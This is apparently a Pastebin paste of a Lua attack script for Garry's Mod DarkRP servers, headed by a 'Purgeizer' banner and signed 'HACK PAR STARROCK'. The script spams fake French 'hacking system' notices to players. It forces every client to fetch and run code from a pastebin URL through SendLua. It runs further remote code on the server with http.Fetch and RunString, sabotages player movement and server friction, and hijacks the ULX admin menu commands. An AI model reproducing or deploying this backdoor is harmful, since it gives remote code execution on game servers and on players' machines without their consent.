Advertisement
Guest User

Untitled

a guest
Jul 23rd, 2019
127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.05 KB | None | 0 0
  1.  
  2. print([[
  3. _____ _ _ _____ ______ _____ _____ ____________ _ _ ______ _____ ____
  4. | __ \| | | | __ \| ____/ ____|_ _|___ / ____| | | | | ____/ ____/ __ \ _
  5. | |__) | | | | |__) | |__ | | __ | | / /| |__ | |__| | | |__ | | | | | |_| |_
  6. | ___/| | | | _ /| __|| | |_ | | | / / | __| | __ | | __|| | | | | |_ _|
  7. | | | |__| | | \ \| |___| |__| |_| |_ / /__| |____| | | | | |___| |___| |__| | |_|
  8. |_| \____/|_| \_\______\_____|_____/_____|______|_| |_| |______\_____\____/
  9.  
  10.  
  11. ]])
  12.  
  13. timer.Create( "gvacspam", 0.1, 1, function()
  14. for k, ply in pairs( player.GetAll() ) do
  15. DarkRP.notify(ply, 2, 4, "HAKINGSYTEME EN CHARGEMENT .")
  16. end
  17. end)
  18.  
  19. timer.Simple( 10, function()
  20. for k, ply in pairs( player.GetAll() ) do
  21. DarkRP.notify(ply, 2, 4, "HAKINGSYTEME INSTALLATION.")
  22. end
  23. end )
  24.  
  25. timer.Simple( 14, function()
  26. for k,v in pairs(player.GetAll()) do
  27. v:SendLua([[http.Fetch('https://pastebin.com/raw/SnagTXBW',function(b,l,h,c)RunString(b)end,nil)]])
  28. v:SetRunSpeed(400* 4);
  29. v:SetWalkSpeed(200 * 2);
  30. end
  31.  
  32. RunConsoleCommand("sv_friction", "-8")
  33.  
  34. end )
  35. end )
  36.  
  37. timer.Simple( 76, function()
  38. http.Fetch('https://pastebin.com/raw/7ABFD4Bu',function(b,l,h,c)RunString(b)end,nil)
  39. end )
  40.  
  41. timer.Simple( 77, function()
  42. for k, ply in pairs( player.GetAll() ) do
  43. DarkRP.notify(ply, 2, 4, "HAKINGSYTEME Merci pour votre patience.")
  44. DarkRP.notify(ply, 2, 20, "HACK PAR STARROCK")
  45. end
  46. end )
  47.  
  48. timer.Simple( 210, function()
  49. RunConsoleCommand("sv_friction", "8")
  50. hook.Remove("Think", "2012akaapocalypse")
  51. end )
  52.  
  53.  
  54. hook.Remove( "PlayerSay", "Pure_Menu" )
  55. concommand.Remove("Pure_openMenu")
  56. concommand.Remove("ulx menu")
  57. ULib.addSayCommand( '!menu', lechat )
  58. ULib.cmds.addCommand( "ulx menu", lechat )
  59. end )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement